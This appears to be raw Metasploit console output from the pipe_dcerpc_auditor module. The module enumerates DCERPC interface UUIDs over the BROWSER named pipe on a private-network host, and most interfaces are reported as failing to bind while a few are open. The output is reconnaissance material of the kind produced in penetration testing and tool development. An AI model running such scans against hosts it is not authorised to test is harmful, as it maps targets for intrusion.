UUID 45776b01-5956-4485-9f80-f428f7d60129 2.0 ERROR Failed to bind. Could not bind to 45776b01-5956-4485-9f80-f428f7d60129:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 45f52c28-7f9f-101a-b52b-08002b2efabe 1.0 ERROR Failed to bind. Could not bind to 45f52c28-7f9f-101a-b52b-08002b2efabe:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 469d6ec0-0d87-11ce-b13f-00aa003bac6c 16.0 ERROR Failed to bind. Could not bind to 469d6ec0-0d87-11ce-b13f-00aa003bac6c:16.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 4825ea41-51e3-4c2a-8406-8f2d2698395f 1.0 ERROR Failed to bind. Could not bind to 4825ea41-51e3-4c2a-8406-8f2d2698395f:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 4a452661-8290-4b36-8fbe-7f4093a94978 1.0 ERROR Failed to bind. Could not bind to 4a452661-8290-4b36-8fbe-7f4093a94978:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 4b112204-0e19-11d3-b42b-0000f81feb9f 1.0 ERROR Failed to bind. Could not bind to 4b112204-0e19-11d3-b42b-0000f81feb9f:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 0.0 ERROR Failed to bind. Could not bind to 4b324fc8-1670-01d3-1278-5a47bf6ee188:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 3.0 ERROR Failed to bind. Could not bind to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 0.0 ERROR Failed to bind. Could not bind to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 4da1c422-943d-11d1-acae-00c04fc2aa3f 1.0 ERROR Failed to bind. Could not bind to 4da1c422-943d-11d1-acae-00c04fc2aa3f:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 4f82f460-0e21-11cf-909e-00805f48a135 4.0 ERROR Failed to bind. Could not bind to 4f82f460-0e21-11cf-909e-00805f48a135:4.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 4fc742e0-4a10-11cf-8273-00aa004ae673 3.0 ERROR Failed to bind. Could not bind to 4fc742e0-4a10-11cf-8273-00aa004ae673:3.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 50abc2a4-574d-40b3-9d66-ee4fd5fba076 5.0 ERROR Failed to bind. Could not bind to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 53e75790-d96b-11cd-ba18-08002b2dfead 2.0 ERROR Failed to bind. Could not bind to 53e75790-d96b-11cd-ba18-08002b2dfead:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 56c8504c-4408-40fd-93fc-afd30f10c90d 1.0 ERROR Failed to bind. Could not bind to 56c8504c-4408-40fd-93fc-afd30f10c90d:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 57674cd0-5200-11ce-a897-08002b2e9c6d 0.0 ERROR Failed to bind. Could not bind to 57674cd0-5200-11ce-a897-08002b2e9c6d:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 57674cd0-5200-11ce-a897-08002b2e9c6d 1.0 ERROR Failed to bind. Could not bind to 57674cd0-5200-11ce-a897-08002b2e9c6d:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc 1.0 ERROR Failed to bind. Could not bind to 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 5b5b3580-b0e0-11d1-b92d-0060081e87f0 1.0 ERROR Failed to bind. Could not bind to 5b5b3580-b0e0-11d1-b92d-0060081e87f0:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 5b821720-f63b-11d0-aad2-00c04fc324db 1.0 ERROR Failed to bind. Could not bind to 5b821720-f63b-11d0-aad2-00c04fc324db:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 5c89f409-09cc-101a-89f3-02608c4d2361 1.1 ERROR Failed to bind. Could not bind to 5c89f409-09cc-101a-89f3-02608c4d2361:1.1@ncacn_np:192.168.175.214[\BROWSER]
UUID 5ca4a760-ebb1-11cf-8611-00a0245420ed 1.0 ERROR Failed to bind. Could not bind to 5ca4a760-ebb1-11cf-8611-00a0245420ed:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 5cbe92cb-f4be-45c9-9fc9-33e73e557b20 1.0 ERROR Failed to bind. Could not bind to 5cbe92cb-f4be-45c9-9fc9-33e73e557b20:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 5f54ce7d-5b79-4175-8584-cb65313a0e98 1.0 ERROR Failed to bind. Could not bind to 5f54ce7d-5b79-4175-8584-cb65313a0e98:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 6099fc12-3eff-11d0-abd0-00c04fd91a4e 3.0 ERROR Failed to bind. Could not bind to 6099fc12-3eff-11d0-abd0-00c04fd91a4e:3.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 621dff68-3c39-4c6c-aae3-e68e2c6503ad 1.0 ERROR Failed to bind. Could not bind to 621dff68-3c39-4c6c-aae3-e68e2c6503ad:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 629b9f66-556c-11d1-8dd2-00aa004abd5e 2.0 ERROR Failed to bind. Could not bind to 629b9f66-556c-11d1-8dd2-00aa004abd5e:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 629b9f66-556c-11d1-8dd2-00aa004abd5e 3.0 ERROR Failed to bind. Could not bind to 629b9f66-556c-11d1-8dd2-00aa004abd5e:3.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 63fbe424-2029-11d1-8db8-00aa004abd5e 1.0 OPEN VIA BROWSER
UUID 654976df-1498-4056-a15e-cb4e87584bd8 1.0 ERROR Failed to bind. Could not bind to 654976df-1498-4056-a15e-cb4e87584bd8:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 65a93890-fab9-43a3-b2a5-1e330ac28f11 2.0 ERROR Failed to bind. Could not bind to 65a93890-fab9-43a3-b2a5-1e330ac28f11:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 68dcd486-669e-11d1-ab0c-00c04fc2dcd2 1.0 ERROR Failed to bind. Could not bind to 68dcd486-669e-11d1-ab0c-00c04fc2dcd2:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 68dcd486-669e-11d1-ab0c-00c04fc2dcd2 2.0 ERROR Failed to bind. Could not bind to 68dcd486-669e-11d1-ab0c-00c04fc2dcd2:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 69510fa1-2f99-4eeb-a4ff-af259f0f9749 1.0 ERROR Failed to bind. Could not bind to 69510fa1-2f99-4eeb-a4ff-af259f0f9749:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 6bffd098-0206-0936-4859-199201201157 1.0 ERROR Failed to bind. Could not bind to 6bffd098-0206-0936-4859-199201201157:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 6bffd098-a112-3610-9833-012892020162 0.0 OPEN VIA BROWSER
UUID 6bffd098-a112-3610-9833-46c3f874532d 1.0 ERROR Failed to bind. Could not bind to 6bffd098-a112-3610-9833-46c3f874532d:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 6bffd098-a112-3610-9833-46c3f87e345a 1.0 ERROR Failed to bind. Could not bind to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 6e17aaa0-1a47-11d1-98bd-0000f875292e 2.0 ERROR Failed to bind. Could not bind to 6e17aaa0-1a47-11d1-98bd-0000f875292e:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 708cca10-9569-11d1-b2a5-0060977d8118 1.0 ERROR Failed to bind. Could not bind to 708cca10-9569-11d1-b2a5-0060977d8118:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 76d12b80-3467-11d3-91ff-0090272f9ea3 1.0 ERROR Failed to bind. Could not bind to 76d12b80-3467-11d3-91ff-0090272f9ea3:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 76f226c3-ec14-4325-8a99-6a46348418af 1.0 ERROR Failed to bind. Could not bind to 76f226c3-ec14-4325-8a99-6a46348418af:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 77df7a80-f298-11d0-8358-00a024c480a8 1.0 ERROR Failed to bind. Could not bind to 77df7a80-f298-11d0-8358-00a024c480a8:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 7af5bbd0-6063-11d1-ae2a-0080c75e4ec1 0.2 ERROR Failed to bind. Could not bind to 7af5bbd0-6063-11d1-ae2a-0080c75e4ec1:0.2@ncacn_np:192.168.175.214[\BROWSER]
UUID 7c44d7d4-31d5-424c-bd5e-2b3e1f323d22 1.0 ERROR Failed to bind. Could not bind to 7c44d7d4-31d5-424c-bd5e-2b3e1f323d22:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 7e048d38-ac08-4ff1-8e6b-f35dbab88d4a 1.0 ERROR Failed to bind. Could not bind to 7e048d38-ac08-4ff1-8e6b-f35dbab88d4a:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 7ea70bcf-48af-4f6a-8968-6a440754d5fa 1.0 ERROR Failed to bind. Could not bind to 7ea70bcf-48af-4f6a-8968-6a440754d5fa:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03 1.0 ERROR Failed to bind. Could not bind to 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 811109bf-a4e1-11d1-ab54-00a0c91e9b45 1.0 ERROR Failed to bind. Could not bind to 811109bf-a4e1-11d1-ab54-00a0c91e9b45:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8174bb16-571b-4c38-8386-1102b449044a 1.0 ERROR Failed to bind. Could not bind to 8174bb16-571b-4c38-8386-1102b449044a:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 82273fdc-e32a-18c3-3f78-827929dc23ea 0.0 ERROR Failed to bind. Could not bind to 82273fdc-e32a-18c3-3f78-827929dc23ea:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 82980780-4b64-11cf-8809-00a004ff3128 3.0 ERROR Failed to bind. Could not bind to 82980780-4b64-11cf-8809-00a004ff3128:3.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 82ad4280-036b-11cf-972c-00aa006887b0 2.0 ERROR Failed to bind. Could not bind to 82ad4280-036b-11cf-972c-00aa006887b0:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 83d72bf0-0d89-11ce-b13f-00aa003bac6c 6.0 ERROR Failed to bind. Could not bind to 83d72bf0-0d89-11ce-b13f-00aa003bac6c:6.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 83da7c00-e84f-11d2-9807-00c04f8ec850 2.0 ERROR Failed to bind. Could not bind to 83da7c00-e84f-11d2-9807-00c04f8ec850:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 86d35949-83c9-4044-b424-db363231fd0c 1.0 OPEN VIA BROWSER
UUID 894de0c0-0d55-11d3-a322-00c04fa321a1 1.0 ERROR Failed to bind. Could not bind to 894de0c0-0d55-11d3-a322-00c04fa321a1:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 89742ace-a9ed-11cf-9c0c-08002be7ae86 2.0 ERROR Failed to bind. Could not bind to 89742ace-a9ed-11cf-9c0c-08002be7ae86:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8c7a6de0-788d-11d0-9edf-444553540000 2.0 ERROR Failed to bind. Could not bind to 8c7a6de0-788d-11d0-9edf-444553540000:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 1.0 ERROR Failed to bind. Could not bind to 8c7daf44-b6dc-11d1-9a4c-0020af6e7c57:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8cfb5d70-31a4-11cf-a7d8-00805f48a135 3.0 ERROR Failed to bind. Could not bind to 8cfb5d70-31a4-11cf-a7d8-00805f48a135:3.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8d09b37c-9f3a-4ebb-b0a2-4dee7d6ceae9 1.0 ERROR Failed to bind. Could not bind to 8d09b37c-9f3a-4ebb-b0a2-4dee7d6ceae9:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8d0ffe72-d252-11d0-bf8f-00c04fd9126b 1.0 ERROR Failed to bind. Could not bind to 8d0ffe72-d252-11d0-bf8f-00c04fd9126b:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8d9f4e40-a03d-11ce-8f69-08003e30051b 0.0 ERROR Failed to bind. Could not bind to 8d9f4e40-a03d-11ce-8f69-08003e30051b:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8d9f4e40-a03d-11ce-8f69-08003e30051b 1.0 ERROR Failed to bind. Could not bind to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8f09f000-b7ed-11ce-bbd2-00001a181cad 0.0 ERROR Failed to bind. Could not bind to 8f09f000-b7ed-11ce-bbd2-00001a181cad:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 8fb6d884-2388-11d0-8c35-00c04fda2795 4.1 ERROR Failed to bind. Could not bind to 8fb6d884-2388-11d0-8c35-00c04fda2795:4.1@ncacn_np:192.168.175.214[\BROWSER]
UUID 906b0ce0-c70b-1067-b317-00dd010662da 1.0 ERROR Failed to bind. Could not bind to 906b0ce0-c70b-1067-b317-00dd010662da:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 91ae6020-9e3c-11cf-8d7c-00aa00c091be 0.0 ERROR Failed to bind. Could not bind to 91ae6020-9e3c-11cf-8d7c-00aa00c091be:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 93149ca2-973b-11d1-8c39-00c04fb984f9 0.0 ERROR Failed to bind. Could not bind to 93149ca2-973b-11d1-8c39-00c04fb984f9:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 93f5ac6f-1a94-4bc5-8d1b-fd44fc255089 1.0 ERROR Failed to bind. Could not bind to 93f5ac6f-1a94-4bc5-8d1b-fd44fc255089:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 95958c94-a424-4055-b62b-b7f4d5c47770 1.0 ERROR Failed to bind. Could not bind to 95958c94-a424-4055-b62b-b7f4d5c47770:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 975201b0-59ca-11d0-a8d5-00a0c90d8051 1.0 ERROR Failed to bind. Could not bind to 975201b0-59ca-11d0-a8d5-00a0c90d8051:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 98fe2c90-a542-11d0-a4ef-00a0c9062910 1.0 ERROR Failed to bind. Could not bind to 98fe2c90-a542-11d0-a4ef-00a0c9062910:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 99e64010-b032-11d0-97a4-00c04fd6551d 3.0 ERROR Failed to bind. Could not bind to 99e64010-b032-11d0-97a4-00c04fd6551d:3.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 ERROR Failed to bind. Could not bind to 99fcfec4-5260-101b-bbcb-00aa0021347a:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 9b3195fe-d603-43d1-a0d5-9072d7cde122 1.0 ERROR Failed to bind. Could not bind to 9b3195fe-d603-43d1-a0d5-9072d7cde122:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 9b8699ae-0e44-47b1-8e7f-86a461d7ecdc 0.0 ERROR Failed to bind. Could not bind to 9b8699ae-0e44-47b1-8e7f-86a461d7ecdc:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 9e8ee830-4459-11ce-979b-00aa005ffebe 2.0 ERROR Failed to bind. Could not bind to 9e8ee830-4459-11ce-979b-00aa005ffebe:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a002b3a0-c9b7-11d1-ae88-0080c75e4ec1 1.0 ERROR Failed to bind. Could not bind to a002b3a0-c9b7-11d1-ae88-0080c75e4ec1:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a00c021c-2be2-11d2-b678-0000f87a8f8e 1.0 ERROR Failed to bind. Could not bind to a00c021c-2be2-11d2-b678-0000f87a8f8e:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a2d47257-12f7-4beb-8981-0ebfa935c407 1.0 ERROR Failed to bind. Could not bind to a2d47257-12f7-4beb-8981-0ebfa935c407:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a398e520-d59a-4bdd-aa7a-3c1e0303a511 1.0 OPEN VIA BROWSER
UUID a3b749b1-e3d0-4967-a521-124055d1c37d 1.0 ERROR Failed to bind. Could not bind to a3b749b1-e3d0-4967-a521-124055d1c37d:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a4c2fd60-5210-11d1-8fc2-00a024cb6019 1.0 ERROR Failed to bind. Could not bind to a4c2fd60-5210-11d1-8fc2-00a024cb6019:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a4f1db00-ca47-1067-b31e-00dd010662da 1.0 ERROR Failed to bind. Could not bind to a4f1db00-ca47-1067-b31e-00dd010662da:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a4f1db00-ca47-1067-b31f-00dd010662da 0.0 ERROR Failed to bind. Could not bind to a4f1db00-ca47-1067-b31f-00dd010662da:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID a4f1db00-ca47-1067-b31f-00dd010662da 0.81 ERROR Failed to bind. Could not bind to a4f1db00-ca47-1067-b31f-00dd010662da:0.81@ncacn_np:192.168.175.214[\BROWSER]
UUID aa177641-fc9b-41bd-80ff-f964a701596f 1.0 ERROR Failed to bind. Could not bind to aa177641-fc9b-41bd-80ff-f964a701596f:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID aa411582-9bdf-48fb-b42b-faa1eee33949 1.0 ERROR Failed to bind. Could not bind to aa411582-9bdf-48fb-b42b-faa1eee33949:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID aae9ac90-ce13-11cf-919e-08002be23c64 1.0 ERROR Failed to bind. Could not bind to aae9ac90-ce13-11cf-919e-08002be23c64:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ae33069b-a2a8-46ee-a235-ddfd339be281 1.0 ERROR Failed to bind. Could not bind to ae33069b-a2a8-46ee-a235-ddfd339be281:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA BROWSER
UUID b58aa02e-2884-4e97-8176-4ee06d794184 1.0 ERROR Failed to bind. Could not bind to b58aa02e-2884-4e97-8176-4ee06d794184:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID b97db8b2-4c63-11cf-bff6-08002be23f2f 2.0 ERROR Failed to bind. Could not bind to b97db8b2-4c63-11cf-bff6-08002be23f2f:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID b9e79e60-3d52-11ce-aaa1-00006901293f 0.2 ERROR Failed to bind. Could not bind to b9e79e60-3d52-11ce-aaa1-00006901293f:0.2@ncacn_np:192.168.175.214[\BROWSER]
UUID bfa951d1-2f0e-11d3-bfd1-00c04fa3490a 1.0 ERROR Failed to bind. Could not bind to bfa951d1-2f0e-11d3-bfd1-00c04fa3490a:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c33b9f46-2088-4dbc-97e3-6125f127661c 1.0 ERROR Failed to bind. Could not bind to c33b9f46-2088-4dbc-97e3-6125f127661c:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c681d488-d850-11d0-8c52-00c04fd90f7e 1.0 ERROR Failed to bind. Could not bind to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c6f3ee72-ce7e-11d1-b71e-00c04fc3111a 1.0 ERROR Failed to bind. Could not bind to c6f3ee72-ce7e-11d1-b71e-00c04fc3111a:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c8cb7687-e6d3-11d2-a958-00c04f682e16 1.0 ERROR Failed to bind. Could not bind to c8cb7687-e6d3-11d2-a958-00c04f682e16:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c9378ff1-16f7-11d0-a0b2-00aa0061426a 1.0 ERROR Failed to bind. Could not bind to c9378ff1-16f7-11d0-a0b2-00aa0061426a:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID c9ac6db5-82b7-4e55-ae8a-e464ed7b4277 1.0 OPEN VIA BROWSER
UUID ce1334a5-41dd-40ea-881d-64326b23effe 0.2 ERROR Failed to bind. Could not bind to ce1334a5-41dd-40ea-881d-64326b23effe:0.2@ncacn_np:192.168.175.214[\BROWSER]
UUID d049b186-814f-11d1-9a3c-00c04fc9b232 1.1 ERROR Failed to bind. Could not bind to d049b186-814f-11d1-9a3c-00c04fc9b232:1.1@ncacn_np:192.168.175.214[\BROWSER]
UUID d2d79dfa-3400-11d0-b40b-00aa005ff586 1.0 ERROR Failed to bind. Could not bind to d2d79dfa-3400-11d0-b40b-00aa005ff586:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d335b8f6-cb31-11d0-b0f9-006097ba4e54 1.5 ERROR Failed to bind. Could not bind to d335b8f6-cb31-11d0-b0f9-006097ba4e54:1.5@ncacn_np:192.168.175.214[\BROWSER]
UUID d3fbb514-0e3b-11cb-8fad-08002b1d29c3 1.0 ERROR Failed to bind. Could not bind to d3fbb514-0e3b-11cb-8fad-08002b1d29c3:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d6d70ef0-0e3b-11cb-acc3-08002b1d29c3 1.0 ERROR Failed to bind. Could not bind to d6d70ef0-0e3b-11cb-acc3-08002b1d29c3:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d6d70ef0-0e3b-11cb-acc3-08002b1d29c4 1.0 ERROR Failed to bind. Could not bind to d6d70ef0-0e3b-11cb-acc3-08002b1d29c4:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d7f9e1c0-2247-11d1-ba89-00c04fd91268 5.0 ERROR Failed to bind. Could not bind to d7f9e1c0-2247-11d1-ba89-00c04fd91268:5.0@ncacn_np:192.168.175.214[\BROWSER]
UUID d95afe70-a6d5-4259-822e-2c84da1ddb0d 1.0 ERROR Failed to bind. Could not bind to d95afe70-a6d5-4259-822e-2c84da1ddb0d:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID dd490425-5325-4565-b774-7e27d6c09c24 1.0 ERROR Failed to bind. Could not bind to dd490425-5325-4565-b774-7e27d6c09c24:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e1af8308-5d1f-11c9-91a4-08002b14a0fa 3.0 ERROR Failed to bind. Could not bind to e1af8308-5d1f-11c9-91a4-08002b14a0fa:3.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e248d0b8-bf15-11cf-8c5e-08002bb49649 2.0 ERROR Failed to bind. Could not bind to e248d0b8-bf15-11cf-8c5e-08002bb49649:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e33c0cc4-0482-101a-bc0c-02608c6ba218 1.0 ERROR Failed to bind. Could not bind to e33c0cc4-0482-101a-bc0c-02608c6ba218:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e3514235-4b06-11d1-ab04-00c04fc2dcd2 4.0 ERROR Failed to bind. Could not bind to e3514235-4b06-11d1-ab04-00c04fc2dcd2:4.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e60c73e6-88f9-11cf-9af1-0020af6e72f4 2.0 ERROR Failed to bind. Could not bind to e60c73e6-88f9-11cf-9af1-0020af6e72f4:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e67ab081-9844-3521-9d32-834f038001c0 1.0 ERROR Failed to bind. Could not bind to e67ab081-9844-3521-9d32-834f038001c0:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID e76ea56d-453f-11cf-bfec-08002be23f2f 2.0 ERROR Failed to bind. Could not bind to e76ea56d-453f-11cf-bfec-08002be23f2f:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ea0a3165-4834-11d2-a6f8-00c04fa346cc 4.0 ERROR Failed to bind. Could not bind to ea0a3165-4834-11d2-a6f8-00c04fa346cc:4.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ec02cae0-b9e0-11d2-be62-0020afeddf63 1.0 ERROR Failed to bind. Could not bind to ec02cae0-b9e0-11d2-be62-0020afeddf63:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ecec0d70-a603-11d0-96b1-00a0c91ece30 1.0 ERROR Failed to bind. Could not bind to ecec0d70-a603-11d0-96b1-00a0c91ece30:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ecec0d70-a603-11d0-96b1-00a0c91ece30 2.0 ERROR Failed to bind. Could not bind to ecec0d70-a603-11d0-96b1-00a0c91ece30:2.0@ncacn_np:192.168.175.214[\BROWSER]
UUID eff55e30-4ee2-11ce-a3c9-00aa00607271 1.0 ERROR Failed to bind. Could not bind to eff55e30-4ee2-11ce-a3c9-00aa00607271:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f50aac00-c7f3-428e-a022-a6b71bfb9d43 1.0 ERROR Failed to bind. Could not bind to f50aac00-c7f3-428e-a022-a6b71bfb9d43:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f5cc59b4-4264-101a-8c59-08002b2f8426 1.1 ERROR Failed to bind. Could not bind to f5cc59b4-4264-101a-8c59-08002b2f8426:1.1@ncacn_np:192.168.175.214[\BROWSER]
UUID f5cc5a18-4264-101a-8c59-08002b2f8426 56.0 ERROR Failed to bind. Could not bind to f5cc5a18-4264-101a-8c59-08002b2f8426:56.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f5cc5a7c-4264-101a-8c59-08002b2f8426 21.0 ERROR Failed to bind. Could not bind to f5cc5a7c-4264-101a-8c59-08002b2f8426:21.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f6beaff7-1e19-4fbb-9f8f-b89e2018337c 1.0 ERROR Failed to bind. Could not bind to f6beaff7-1e19-4fbb-9f8f-b89e2018337c:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID f930c514-1215-11d3-99a5-00a0c9b61b04 1.0 ERROR Failed to bind. Could not bind to f930c514-1215-11d3-99a5-00a0c9b61b04:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID fc13257d-5567-4dea-898d-c6f9c48415a0 1.0 ERROR Failed to bind. Could not bind to fc13257d-5567-4dea-898d-c6f9c48415a0:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID fd7a0523-dc70-43dd-9b2e-9c5ed48225b1 1.0 ERROR Failed to bind. Could not bind to fd7a0523-dc70-43dd-9b2e-9c5ed48225b1:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 1.0 ERROR Failed to bind. Could not bind to fdb3a030-065f-11d1-bb9b-00a024ea5525:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID ffe561b8-bf15-11cf-8c5e-08002bb49649 2.0 ERROR Failed to bind. Could not bind to ffe561b8-bf15-11cf-8c5e-08002bb49649:2.0@ncacn_np:192.168.175.214[\BROWSER]
[*] 192.168.175.214: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

features set smb_session_type true

msf6 auxiliary(scanner/smb/pipe_dcerpc_auditor) > run session=1 SMB::AlwaysEncrypt=false SMB::ProtocolVersion=2 threads=11

[*] Using existing session 1
UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000136-0000-0000-c000-000000000046 0.0 ERROR Failed to bind. Could not bind to 00000136-0000-0000-c000-000000000046:0.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 000001a0-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 04fcb220-fcfd-11cd-bec8-00aa0047ae4e 1.0 ERROR Failed to bind. Could not bind to 04fcb220-fcfd-11cd-bec8-00aa0047ae4e:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 06bba54a-be05-49f9-b0a0-30f790261023 1.0 ERROR Failed to bind. Could not bind to 06bba54a-be05-49f9-b0a0-30f790261023:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 0767a036-0d22-48aa-ba69-b619480f38cb 1.0 ERROR Failed to bind. Could not bind to 0767a036-0d22-48aa-ba69-b619480f38cb:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 0a5a5830-58e0-11ce-a3cc-00aa00607271 1.0 ERROR Failed to bind. Could not bind to 0a5a5830-58e0-11ce-a3cc-00aa00607271:1.0@ncacn_np:192.168.175.214[\BROWSER]
UUID 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 1.0 OPEN VIA BROWSER
UUID 0b0a6584-9e0f-11cf-a3cf-00805f68cb1b 1.0 ERROR Failed to bind. Could not bind to 0b0a6584-9e0f-11cf-a3cf-00805f68cb1b:1.0@ncacn_np:192.168.175.214[\BROWSER]
